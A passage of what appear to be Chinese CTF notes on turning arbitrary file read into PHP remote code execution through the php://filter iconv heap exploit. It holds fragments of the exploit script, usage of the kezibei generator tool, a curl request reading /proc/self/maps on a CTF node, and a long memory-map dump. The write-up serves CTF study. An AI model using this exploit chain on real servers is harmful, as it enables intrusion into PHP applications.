"b": b64decode("cHN5Y2hvCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFetWq88ihNWtZYYbaXqMoFf+9mkIi+P1ESiN3ZYuAjXbSzg1ExS1/tvEHQZAgJ+eyubdAX/bK6NRfQfBDyuAQ+bEtSBpUr5SA95RSrcK7G0D95jw0DaMjmLwwB/i19oxtOLZDivhXwUdwbCOkM8DBv9u5jOFs63tjrzmTU5+f/C")
},
headers={"Content-Type": "application/x-www-form-urlencoded"}
)
def download(self, path: str) -> bytes:
"""Returns the contents of a remote file.
"""
path = f"php://filter/convert.base64-encode/resource={path}"
response = self.send(path)
data = response.re.search(b"<\/code>([\s\S]*)", flags=re.S).group(1)
print(response.text)
return base64.decode(data)
@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep_time", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("heap", "Address of the main zend_mm_heap structure.")
@arg(
"pad",
"Number of 0x100 chunks to pad with. If the website makes a lot of heap "
"operations with this size, increase this. Defaults to 20.",
)kezibei脚本
https://github.com/kezibei/php-filter-iconv 该脚本只要当前⽬录中有⽬标靶机的/proc/self/maps和libc.so⽂件,即可将payload跑出来,让我们⾃ ⼰去运⾏。 payload会随着当前maps的变化⽽变化,因此payload并不是固定的
https://github.com/kezibei/php-filter-iconv?tab=readme-ov-file
https://xyaxxya.github.io/posts/2b7eb6e9.html#ez-readfile
https://www.nssctf.cn/note/set/11874
通过任意文件下载获取目标的/proc/self/maps和libc-2.x.so,在本机和php-filter-iconv.py放在同目录,然后运行脚本即可生成php://filter/的RCE payload,详细参数调整如下代码即可。
…….
maps_path = ‘./maps’
cmd = ‘echo 123 > 1.txt’
sleep_time = 1
padding = 20if not os.path.exists(maps_path):
exit(“[-]no maps file”)regions = get_regions(maps_path)
heap, libc_info = get_symbols_and_addresses(regions)libc_path = libc_info.path
print(“[*]download: “+libc_path)libc_path = ‘./libc-2.23.so’
…….
curl -X POST http://node1.anna.nssctf.cn:28468/?file=/proc/self/maps -d "a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"55d9ac153000-55d9ac18b000 r--p 00000000 00:39 2658390 /usr/sbin/apache2
55d9ac18b000-55d9ac1da000 r-xp 00038000 00:39 2658390 /usr/sbin/apache2
55d9ac1da000-55d9ac1fe000 r--p 00087000 00:39 2658390 /usr/sbin/apache2
55d9ac1fe000-55d9ac202000 r--p 000aa000 00:39 2658390 /usr/sbin/apache2
55d9ac202000-55d9ac206000 rw-p 000ae000 00:39 2658390 /usr/sbin/apache2
55d9ac206000-55d9ac20a000 rw-p 00000000 00:00 0
55d9ad330000-55d9ad4f9000 rw-p 00000000 00:00 0 [heap]
7fce5d8fd000-7fce5d8fe000 r--p 00000000 00:39 2658353 /usr/lib/x86_64-linux-gnu/libicudata.so.67.1
7fce5d8fe000-7fce5d8ff000 r-xp 00001000 00:39 2658353 /usr/lib/x86_64-linux-gnu/libicudata.so.67.1
7fce5d8ff000-7fce5f414000 r--p 00002000 00:39 2658353 /usr/lib/x86_64-linux-gnu/libicudata.so.67.1
7fce5f414000-7fce5f415000 r--p 01b16000 00:39 2658353 /usr/lib/x86_64-linux-gnu/libicudata.so.67.1
7fce5f415000-7fce5f416000 rw-p 01b17000 00:39 2658353 /usr/lib/x86_64-linux-gnu/libicudata.so.67.1
7fce5f416000-7fce5f45a000 rw-p 00000000 00:00 0
7fce5f45a000-7fce5f45d000 r--p 00000000 00:39 2650544 /lib/x86_64-linux-gnu/libnss_files-2.31.so
7fce5f45d000-7fce5f464000 r-xp 00003000 00:39 2650544 /lib/x86_64-linux-gnu/libnss_files-2.31.so
7fce5f464000-7fce5f466000 r--p 0000a000 00:39 2650544 /lib/x86_64-linux-gnu/libnss_files-2.31.so
7fce5f466000-7fce5f467000 r--p 0000b000 00:39 2650544 /lib/x86_64-linux-gnu/libnss_files-2.31.so
7fce5f467000-7fce5f468000 rw-p 0000c000 00:39 2650544 /lib/x86_64-linux-gnu/libnss_files-2.31.so
7fce5f468000-7fce5f49e000 rw-p 00000000 00:00 0
7fce5f4a6000-7fce5f4a8000 rw-p 00000000 00:00 0
7fce5f4ae000-7fce5f4b0000 rw-p 00000000 00:00 0
7fce5fd60000-7fce5fd63000 r--p 00000000 00:39 2650526 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fce5fd63000-7fce5fd74000 r-xp 00003000 00:39 2650526 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fce5fd74000-7fce5fd78000 r--p 00014000 00:39 2650526 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fce5fd78000-7fce5fd79000 r--p 00017000 00:39 2650526 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fce5fd79000-7fce5fd7a000 rw-p 00018000 00:39 2650526 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fce5fd7a000-7fce5fe10000 r--p 00000000 00:39 2651288 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.28
7fce5fe10000-7fce5feec000 r-xp 00096000 00:39 2651288 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.28
7fce5feec000-7fce5ff36000 r--p 00172000 00:39 2651288 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.28
7fce5ff36000-7fce5ff41000 r--p 001bb000 00:39 2651288 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.28
7fce5ff41000-7fce5ff44000 rw-p 001c6000 00:39 2651288 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.28
7fce5ff44000-7fce5ff47000 rw-p 00000000 00:00 0
7fce60e00000-7fce61000000 rw-p 00000000 00:00 0
7fce61054000-7fce610d5000 rw-p 00000000 00:00 0
7fce610d5000-7fce610e1000 r--p 00000000 00:39 2659076 /usr/lib/x86_64-linux-gnu/libsodium.so.23.3.0
7fce610e1000-7fce6111a000 r-xp 0000c000 00:39 2659076 /usr/lib/x86_64-linux-gnu/libsodium.so.23.3.0
7fce6111a000-7fce6112c000 r--p 00045000 00:39 2659076 /usr/lib/x86_64-linux-gnu/libsodium.so.23.3.0
7fce6112c000-7fce6112d000 ---p 00057000 00:39 2659076 /usr/lib/x86_64-linux-gnu/libsodium.so.23.3.0
7fce6112d000-7fce6112e000 r--p 00057000 00:39 2659076 /usr/lib/x86_64-linux-gnu/libsodium.so.23.3.0
7fce6112e000-7fce6112f000 rw-p 00058000 00:39 2659076 /usr/lib/x86_64-linux-gnu/libsodium.so.23.3.0
7fce6112f000-7fce61246000 r--p 00000000 00:39 2659069 /usr/lib/apache2/modules/libphp7.so
7fce61246000-7fce615fd000 r-xp 00117000 00:39 2659069 /usr/lib/apache2/modules/libphp7.so
7fce615fd000-7fce61de1000 r--p 004ce000 00:39 2659069 /usr/lib/apache2/modules/libphp7.so
7fce61de1000-7fce61de2000 ---p 00cb2000 00:39 2659069 /usr/lib/apache2/modules/libphp7.so
7fce61de2000-7fce61e89000 r--p 00cb2000 00:39 2659069 /usr/lib/apache2/modules/libphp7.so
7fce61e89000-7fce61e98000 rw-p 00d59000 00:39 2659069 /usr/lib/apache2/modules/libphp7.so
7fce61e98000-7fce61eb9000 rw-p 00000000 00:00 0
7fce61eb9000-7fce61f3f000 r--p 00000000 00:39 2651243 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.1
7fce61f3f000-7fce620e6000 r-xp 00086000 00:39 2651243 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.1
7fce620e6000-7fce62176000 r--p 0022d000 00:39 2651243 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.1
7fce62176000-7fce62177000 ---p 002bd000 00:39 2651243 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.1
7fce62177000-7fce621a7000 r--p 002bd000 00:39 2651243 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.1
7fce621a7000-7fce621a9000 rw-p 002ed000 00:39 2651243 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.1
7fce621a9000-7fce621ad000 rw-p 00000000 00:00 0
7fce621ad000-7fce621ca000 r--p 00000000 00:39 2651286 /usr/lib/x86_64-linux-gnu/libssl.so.1.1
7fce621ca000-7fce62218000 r-xp 0001d000 00:39 2651286 /usr/lib/x86_64-linux-gnu/libssl.so.1.1
7fce62218000-7fce62232000 r--p 0006b000 00:39 2651286 /usr/lib/x86_64-linux-gnu/libssl.so.1.1
7fce62232000-7fce62233000 ---p 00085000 00:39 2651286 /usr/lib/x86_64-linux-gnu/libssl.so.1.1
7fce62233000-7fce6223c000 r--p 00085000 00:39 2651286 /usr/lib/x86_64-linux-gnu/libssl.so.1.1
7fce6223c000-7fce62240000 rw-p 0008e000 00:39 2651286 /usr/lib/x86_64-linux-gnu/libssl.so.1.1
7fce62251000-7fce62257000 rw-p 00000000 00:00 0
7fce62257000-7fce6226f000 rw-s 00000000 00:01 1535 /dev/zero (deleted)
7fce6226f000-7fce62274000 r--p 00000000 00:39 2659608 /usr/local/lib/php/extensions/no-debug-non-zts-20180731/sodium.so
7fce62274000-7fce6227c000 r-xp 00005000 00:39 2659608 /usr/local/lib/php/extensions/no-debug-non-zts-20180731/sodium.so
7fce6227c000-7fce62281000 r--p 0000d000 00:39 2659608 /usr/local/lib/php/extensions/no-debug-non-zts-20180731/sodium.so
7fce62281000-7fce62282000 ---p 00012000 00:39 2659608 /usr/local/lib/php/extensions/no-debug-non-zts-20180731/sodium.so
7fce62282000-7fce62284000 r--p 00012000 00:39 2659608 /usr/local/lib/php/extensions/no-debug-non-zts-20180731/sodium.so
7fce62284000-7fce62285000 rw-p 00014000 00:39 2659608 /usr/local/lib/php/extensions/no-debug-non-zts-20180731/sodium.so
7fce62285000-7fce622a6000 rw-p 00000000 00:00 0
7fce622a6000-7fce622a9000 r--p 00000000 00:39 2658299 /usr/lib/apache2/modules/mod_rewrite.so
7fce622a9000-7fce622b4000 r-xp 00003000 00:39 2658299 /usr/lib/apache2/modules/mod_rewrite.so
7fce622b4000-7fce622b8000 r--p 0000e000 00:39 2658299 /usr/lib/apache2/modules/mod_rewrite.so
7fce622b8000-7fce622b9000 r--p 00011000 00:39 2658299 /usr/lib/apache2/modules/mod_rewrite.so
7fce622b9000-7fce622ba000 rw-p 00012000 00:39 2658299 /usr/lib/apache2/modules/mod_rewrite.so
7fce622ba000-7fce622e5000 r--p 00000000 00:39 2651276 /usr/lib/x86_64-linux-gnu/libp11-kit.so.0.3.0
7fce622e5000-7fce6237d000 r-xp 0002b000 00:39 2651276 /usr/lib/x86_64-linux-gnu/libp11-kit.so.0.3.0
7fce6237d000-7fce623d9000 r--p 000c3000 00:39 2651276 /usr/lib/x86_64-linux-gnu/libp11-kit.so.0.3.0
7fce623d9000-7fce623e4000 r--p 0011e000 00:39 2651276 /usr/lib/x86_64-linux-gnu/libp11-kit.so.0.3.0
7fce623e4000-7fce623ee000 rw-p 00129000 00:39 2651276 /usr/lib/x86_64-linux-gnu/libp11-kit.so.0.3.0
7fce623ee000-7fce623fd000 r--p 00000000 00:39 2650533 /lib/x86_64-linux-gnu/libm-2.31.so
7fce623fd000-7fce62497000 r-xp 0000f000 00:39 2650533 /lib/x86_64-linux-gnu/libm-2.31.so
7fce62497000-7fce62530000 r--p 000a9000 00:39 2650533 /lib/x86_64-linux-gnu/libm-2.31.so
7fce62530000-7fce62531000 r--p 00141000 00:39 2650533 /lib/x86_64-linux-gnu/libm-2.31.so
7fce62531000-7fce62532000 rw-p 00142000 00:39 2650533 /lib/x86_64-linux-gnu/libm-2.31.so
7fce62532000-7fce62534000 rw-p 00000000 00:00 0
7fce62534000-7fce62535000 r--p 00000000 00:39 2658314 /usr/lib/apache2/modules/mod_status.so
7fce62535000-7fce62538000 r-xp 00001000 00:39 2658314 /usr/lib/apache2/modules/mod_status.so
7fce62538000-7fce6253a000 r--p 00004000 00:39 2658314 /usr/lib/apache2/modules/mod_status.so
7fce6253a000-7fce6253b000 r--p 00005000 00:39 2658314 /usr/lib/apache2/modules/mod_status.so
7fce6253b000-7fce6253c000 rw-p 00006000 00:39 2658314 /usr/lib/apache2/modules/mod_status.so
7fce6253c000-7fce6253d000 r--p 00000000 00:39 2658305 /usr/lib/apache2/modules/mod_setenvif.so
7fce6253d000-7fce6253f000 r-xp 00001000 00:39 2658305 /usr/lib/apache2/modules/mod_setenvif.so
7fce6253f000-7fce62540000 r--p 00003000 00:39 2658305 /usr/lib/apache2/modules/mod_setenvif.so
7fce62540000-7fce62541000 r--p 00003000 00:39 2658305 /usr/lib/apache2/modules/mod_setenvif.so
7fce62541000-7fce62542000 rw-p 00004000 00:39 2658305 /usr/lib/apache2/modules/mod_setenvif.so
7fce62542000-7fce62543000 r--p 00000000 00:39 2658297 /usr/lib/apache2/modules/mod_reqtimeout.so
7fce62543000-7fce62545000 r-xp 00001000 00:39 2658297 /usr/lib/apache2/modules/mod_reqtimeout.so
7fce62545000-7fce62546000 r--p 00003000 00:39 2658297 /usr/lib/apache2/modules/mod_reqtimeout.so
7fce62546000-7fce62547000 r--p 00003000 00:39 2658297 /usr/lib/apache2/modules/mod_reqtimeout.so
7fce62547000-7fce62548000 rw-p 00004000 00:39 2658297 /usr/lib/apache2/modules/mod_reqtimeout.so
7fce62548000-7fce6254a000 r--p 00000000 00:39 2651248 /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
7fce6254a000-7fce62550000 r-xp 00002000 00:39 2651248 /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
7fce62550000-7fce62552000 r--p 00008000 00:39 2651248 /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
7fce62552000-7fce62553000 r--p 00009000 00:39 2651248 /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
7fce62553000-7fce62554000 rw-p 0000a000 00:39 2651248 /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
7fce62554000-7fce62556000 r--p 00000000 00:39 2650530 /lib/x86_64-linux-gnu/libkeyutils.so.1.9
7fce62556000-7fce62558000 r-xp 00002000 00:39 2650530 /lib/x86_64-linux-gnu/libkeyutils.so.1.9
7fce62558000-7fce62559000 r--p 00004000 00:39 2650530 /lib/x86_64-linux-gnu/libkeyutils.so.1.9
7fce62559000-7fce6255a000 r--p 00004000 00:39 2650530 /lib/x86_64-linux-gnu/libkeyutils.so.1.9
7fce6255a000-7fce6255b000 rw-p 00005000 00:39 2650530 /lib/x86_64-linux-gnu/libkeyutils.so.1.9
7fce6255b000-7fce6255f000 r--p 00000000 00:39 2650528 /lib/x86_64-linux-gnu/libgpg-error.so.0.29.0
7fce6255f000-7fce62574000 r-xp 00004000 00:39 2650528 /lib/x86_64-linux-gnu/libgpg-error.so.0.29.0
7fce62574000-7fce6257e000 r--p 00019000 00:39 2650528 /lib/x86_64-linux-gnu/libgpg-error.so.0.29.0
7fce6257e000-7fce6257f000 ---p 00023000 00:39 2650528 /lib/x86_64-linux-gnu/libgpg-error.so.0.29.0
7fce6257f000-7fce62580000 r--p 00023000 00:39 2650528 /lib/x86_64-linux-gnu/libgpg-error.so.0.29.0
7fce62580000-7fce62581000 rw-p 00024000 00:39 2650528 /lib/x86_64-linux-gnu/libgpg-error.so.0.29.0
7fce62581000-7fce62584000 r--p 00000000 00:39 2651292 /usr/lib/x86_64-linux-gnu/libtasn1.so.6.6.0
7fce62584000-7fce62590000 r-xp 00003000 00:39 2651292 /usr/lib/x86_64-linux-gnu/libtasn1.so.6.6.0
7fce62590000-7fce62594000 r--p 0000f000 00:39 2651292 /usr/lib/x86_64-linux-gnu/libtasn1.so.6.6.0
7fce62594000-7fce62595000 ---p 00013000 00:39 2651292 /usr/lib/x86_64-linux-gnu/libtasn1.so.6.6.0
7fce62595000-7fce62596000 r--p 00013000 00:39 2651292 /usr/lib/x86_64-linux-gnu/libtasn1.so.6.6.0
7fce62596000-7fce62597000 rw-p 00014000 00:39 2651292 /usr/lib/x86_64-linux-gnu/libtasn1.so.6.6.0
7fce62597000-7fce62598000 r--p 00000000 00:39 2752815 /usr/lib/x86_64-linux-gnu/libbrotlicommon.so.1.0.9
7fce62598000-7fce62599000 r-xp 00001000 00:39 2752815 /usr/lib/x86_64-linux-gnu/libbrotlicommon.so.1.0.9
7fce62599000-7fce625b8000 r--p 00002000 00:39 2752815 /usr/lib/x86_64-linux-gnu/libbrotlicommon.so.1.0.9
7fce625b8000-7fce625b9000 r--p 00020000 00:39 2752815 /usr/lib/x86_64-linux-gnu/libbrotlicommon.so.1.0.9
7fce625b9000-7fce625ba000 rw-p 00021000 00:39 2752815 /usr/lib/x86_64-linux-gnu/libbrotlicommon.so.1.0.9
7fce625ba000-7fce625bd000 r--p 00000000 00:39 2752899 /usr/lib/x86_64-linux-gnu/libsasl2.so.2.0.25
7fce625bd000-7fce625cf000 r-xp 00003000 00:39 2752899 /usr/lib/x86_64-linux-gnu/libsasl2.so.2.0.25
7fce625cf000-7fce625d5000 r--p 00015000 00:39 2752899 /usr/lib/x86_64-linux-gnu/libsasl2.so.2.0.25
7fce625d5000-7fce625d6000 r--p 0001a000 00:39 2752899 /usr/lib/x86_64-linux-gnu/libsasl2.so.2.0.25
7fce625d6000-7fce625d7000 rw-p 0001b000 00:39 2752899 /usr/lib/x86_64-linux-gnu/libsasl2.so.2.0.25
7fce625d7000-7fce625da000 r--p 00000000 00:39 2651266 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
7fce625da000-7fce625e1000 r-xp 00003000 00:39 2651266 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
7fce625e1000-7fce625e4000 r--p 0000a000 00:39 2651266 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
7fce625e4000-7fce625e5000 r--p 0000c000 00:39 2651266 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
7fce625e5000-7fce625e6000 rw-p 0000d000 00:39 2651266 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
7fce625e6000-7fce625ea000 r--p 00000000 00:39 2651262 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
7fce625ea000-7fce62605000 r-xp 00004000 00:39 2651262 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
7fce62605000-7fce62612000 r--p 0001f000 00:39 2651262 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
7fce62612000-7fce62613000 ---p 0002c000 00:39 2651262 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
7fce62613000-7fce62614000 r--p 0002c000 00:39 2651262 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
7fce62614000-7fce62615000 rw-p 0002d000 00:39 2651262 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
7fce62615000-7fce62616000 rw-p 00000000 00:00 0
7fce62616000-7fce62639000 r--p 00000000 00:39 2651264 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
7fce62639000-7fce62697000 r-xp 00023000 00:39 2651264 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
7fce62697000-7fce626df000 r--p 00081000 00:39 2651264 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
7fce626df000-7fce626ed000 r--p 000c8000 00:39 2651264 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
7fce626ed000-7fce626f0000 rw-p 000d6000 00:39 2651264 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
7fce626f0000-7fce626f4000 rw-p 00000000 00:00 0
7fce626f4000-7fce626f6000 r--p 00000000 00:39 2650517 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7fce626f6000-7fce626f7000 r-xp 00002000 00:39 2650517 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7fce626f7000-7fce626f8000 r--p 00003000 00:39 2650517 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7fce626f8000-7fce626f9000 r--p 00003000 00:39 2650517 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7fce626f9000-7fce626fa000 rw-p 00004000 00:39 2650517 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7fce626fa000-7fce62706000 r--p 00000000 00:39 2651250 /usr/lib/x86_64-linux-gnu/libgcrypt.so.20.2.8
7fce62706000-7fce627d6000 r-xp 0000c000 00:39 2651250 /usr/lib/x86_64-linux-gnu/libgcrypt.so.20.2.8
7fce627d6000-7fce62813000 r--p 000dc000 00:39 2651250 /usr/lib/x86_64-linux-gnu/libgcrypt.so.20.2.8
7fce62813000-7fce62815000 r--p 00118000 00:39 2651250 /usr/lib/x86_64-linux-gnu/libgcrypt.so.20.2.8
7fce62815000-7fce6281a000 rw-p 0011a000 00:39 2651250 /usr/lib/x86_64-linux-gnu/libgcrypt.so.20.2.8
7fce6281a000-7fce62825000 r--p 00000000 00:39 2651252 /usr/lib/x86_64-linux-gnu/libgmp.so.10.4.1
7fce62825000-7fce62881000 r-xp 0000b000 00:39 2651252 /usr/lib/x86_64-linux-gnu/libgmp.so.10.4.1
7fce62881000-7fce62898000 r--p 00067000 00:39 2651252 /usr/lib/x86_64-linux-gnu/libgmp.so.10.4.1
7fce62898000-7fce62899000 ---p 0007e000 00:39 2651252 /usr/lib/x86_64-linux-gnu/libgmp.so.10.4.1
7fce62899000-7fce6289a000 r--p 0007e000 00:39 2651252 /usr/lib/x86_64-linux-gnu/libgmp.so.10.4.1
7fce6289a000-7fce6289b000 rw-p 0007f000 00:39 2651252 /usr/lib/x86_64-linux-gnu/libgmp.so.10.4.1
7fce6289b000-7fce628a7000 r--p 00000000 00:39 2651272 /usr/lib/x86_64-linux-gnu/libnettle.so.8.4
7fce628a7000-7fce628c9000 r-xp 0000c000 00:39 2651272 /usr/lib/x86_64-linux-gnu/libnettle.so.8.4
7fce628c9000-7fce628df000 r--p 0002e000 00:39 2651272 /usr/lib/x86_64-linux-gnu/libnettle.so.8.4
7fce628df000-7fce628e0000 ---p 00044000 00:39 2651272 /usr/lib/x86_64-linux-gnu/libnettle.so.8.4
7fce628e0000-7fce628e2000 r--p 00044000 00:39 2651272 /usr/lib/x86_64-linux-gnu/libnettle.so.8.4
7fce628e2000-7fce628e3000 rw-p 00046000 00:39 2651272 /usr/lib/x86_64-linux-gnu/libnettle.so.8.4
7fce628e3000-7fce628ec000 r--p 00000000 00:39 2651258 /usr/lib/x86_64-linux-gnu/libhogweed.so.6.4
7fce628ec000-7fce628ff000 r-xp 00009000 00:39 2651258 /usr/lib/x86_64-linux-gnu/libhogweed.so.6.4
7fce628ff000-7fce62929000 r--p 0001c000 00:39 2651258 /usr/lib/x86_64-linux-gnu/libhogweed.so.6.4
7fce62929000-7fce6292a000 ---p 00046000 00:39 2651258 /usr/lib/x86_64-linux-gnu/libhogweed.so.6.4
7fce6292a000-7fce6292b000 r--p 00046000 00:39 2651258 /usr/lib/x86_64-linux-gnu/libhogweed.so.6.4
7fce6292b000-7fce6292c000 rw-p 00047000 00:39 2651258 /usr/lib/x86_64-linux-gnu/libhogweed.so.6.4
7fce6292c000-7fce62960000 r--p 00000000 00:39 2651254 /usr/lib/x86_64-linux-gnu/libgnutls.so.30.29.1
7fce62960000-7fce62a81000 r-xp 00034000 00:39 2651254 /usr/lib/x86_64-linux-gnu/libgnutls.so.30.29.1
7fce62a81000-7fce62b17000 r--p 00155000 00:39 2651254 /usr/lib/x86_64-linux-gnu/libgnutls.so.30.29.1
7fce62b17000-7fce62b28000 r--p 001ea000 00:39 2651254 /usr/lib/x86_64-linux-gnu/libgnutls.so.30.29.1
7fce62b28000-7fce62b2a000 rw-p 001fb000 00:39 2651254 /usr/lib/x86_64-linux-gnu/libgnutls.so.30.29.1
7fce62b2a000-7fce62b2c000 rw-p 00000000 00:00 0
7fce62b2c000-7fce62b3d000 r--p 00000000 00:39 2651298 /usr/lib/x86_64-linux-gnu/libunistring.so.2.1.0
7fce62b3d000-7fce62b72000 r-xp 00011000 00:39 2651298 /usr/lib/x86_64-linux-gnu/libunistring.so.2.1.0
7fce62b72000-7fce62ca9000 r--p 00046000 00:39 2651298 /usr/lib/x86_64-linux-gnu/libunistring.so.2.1.0
7fce62ca9000-7fce62cad000 r--p 0017c000 00:39 2651298 /usr/lib/x86_64-linux-gnu/libunistring.so.2.1.0
7fce62cad000-7fce62cae000 rw-p 00180000 00:39 2651298 /usr/lib/x86_64-linux-gnu/libunistring.so.2.1.0
7fce62cae000-7fce62caf000 r--p 00000000 00:39 2752817 /usr/lib/x86_64-linux-gnu/libbrotlidec.so.1.0.9
7fce62caf000-7fce62cb7000 r-xp 00001000 00:39 2752817 /usr/lib/x86_64-linux-gnu/libbrotlidec.so.1.0.9
7fce62cb7000-7fce62cba000 r--p 00009000 00:39 2752817 /usr/lib/x86_64-linux-gnu/libbrotlidec.so.1.0.9
7fce62cba000-7fce62cbb000 r--p 0000b000 00:39 2752817 /usr/lib/x86_64-linux-gnu/libbrotlidec.so.1.0.9
7fce62cbb000-7fce62cbc000 rw-p 0000c000 00:39 2752817 /usr/lib/x86_64-linux-gnu/libbrotlidec.so.1.0.9
7fce62cbc000-7fce62cbf000 r--p 00000000 00:39 2752857 /usr/lib/x86_64-linux-gnu/liblber-2.4.so.2.11.5
7fce62cbf000-7fce62cc7000 r-xp 00003000 00:39 2752857 /usr/lib/x86_64-linux-gnu/liblber-2.4.so.2.11.5
7fce62cc7000-7fce62cca000 r--p 0000b000 00:39 2752857 /usr/lib/x86_64-linux-gnu/liblber-2.4.so.2.11.5
7fce62cca000-7fce62ccb000 ---p 0000e000 00:39 2752857 /usr/lib/x86_64-linux-gnu/liblber-2.4.so.2.11.5
7fce62ccb000-7fce62ccc000 r--p 0000e000 00:39 2752857 /usr/lib/x86_64-linux-gnu/liblber-2.4.so.2.11.5
7fce62ccc000-7fce62ccd000 rw-p 0000f000 00:39 2752857 /usr/lib/x86_64-linux-gnu/liblber-2.4.so.2.11.5
7fce62ccd000-7fce62cdb000 r--p 00000000 00:39 2752860 /usr/lib/x86_64-linux-gnu/libldap_r-2.4.so.2.11.5
7fce62cdb000-7fce62d0e000 r-xp 0000e000 00:39 2752860 /usr/lib/x86_64-linux-gnu/libldap_r-2.4.so.2.11.5
7fce62d0e000-7fce62d1d000 r--p 00041000 00:39 2752860 /usr/lib/x86_64-linux-gnu/libldap_r-2.4.so.2.11.5
7fce62d1d000-7fce62d1e000 ---p 00050000 00:39 2752860 /usr/lib/x86_64-linux-gnu/libldap_r-2.4.so.2.11.5
7fce62d1e000-7fce62d20000 r--p 00050000 00:39 2752860 /usr/lib/x86_64-linux-gnu/libldap_r-2.4.so.2.11.5
7fce62d20000-7fce62d21000 rw-p 00052000 00:39 2752860 /usr/lib/x86_64-linux-gnu/libldap_r-2.4.so.2.11.5
7fce62d21000-7fce62d23000 rw-p 00000000 00:00 0
7fce62d23000-7fce62d2f000 r--p 00000000 00:39 2651256 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
7fce62d2f000-7fce62d64000 r-xp 0000c000 00:39 2651256 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
7fce62d64000-7fce62d71000 r--p 00041000 00:39 2651256 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
7fce62d71000-7fce62d72000 ---p 0004e000 00:39 2651256 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
7fce62d72000-7fce62d74000 r--p 0004e000 00:39 2651256 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
7fce62d74000-7fce62d76000 rw-p 00050000 00:39 2651256 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
7fce62d76000-7fce62d78000 r--p 00000000 00:39 2752887 /usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
7fce62d78000-7fce62d7a000 r-xp 00002000 00:39 2752887 /usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
7fce62d7a000-7fce62d88000 r--p 00004000 00:39 2752887 /usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
7fce62d88000-7fce62d89000 r--p 00011000 00:39 2752887 /usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
7fce62d89000-7fce62d8a000 rw-p 00012000 00:39 2752887 /usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
7fce62d8a000-7fce62d8f000 r--p 00000000 00:39 2752903 /usr/lib/x86_64-linux-gnu/libssh2.so.1.0.1
7fce62d8f000-7fce62db1000 r-xp 00005000 00:39 2752903 /usr/lib/x86_64-linux-gnu/libssh2.so.1.0.1
7fce62db1000-7fce62dbc000 r--p 00027000 00:39 2752903 /usr/lib/x86_64-linux-gnu/libssh2.so.1.0.1
7fce62dbc000-7fce62dbd000 ---p 00032000 00:39 2752903 /usr/lib/x86_64-linux-gnu/libssh2.so.1.0.1
7fce62dbd000-7fce62dbe000 r--p 00032000 00:39 2752903 /usr/lib/x86_64-linux-gnu/libssh2.so.1.0.1
7fce62dbe000-7fce62dbf000 rw-p 00033000 00:39 2752903 /usr/lib/x86_64-linux-gnu/libssh2.so.1.0.1
7fce62dbf000-7fce62dc4000 r--p 00000000 00:39 2752897 /usr/lib/x86_64-linux-gnu/librtmp.so.1
7fce62dc4000-7fce62dd4000 r-xp 00005000 00:39 2752897 /usr/lib/x86_64-linux-gnu/librtmp.so.1
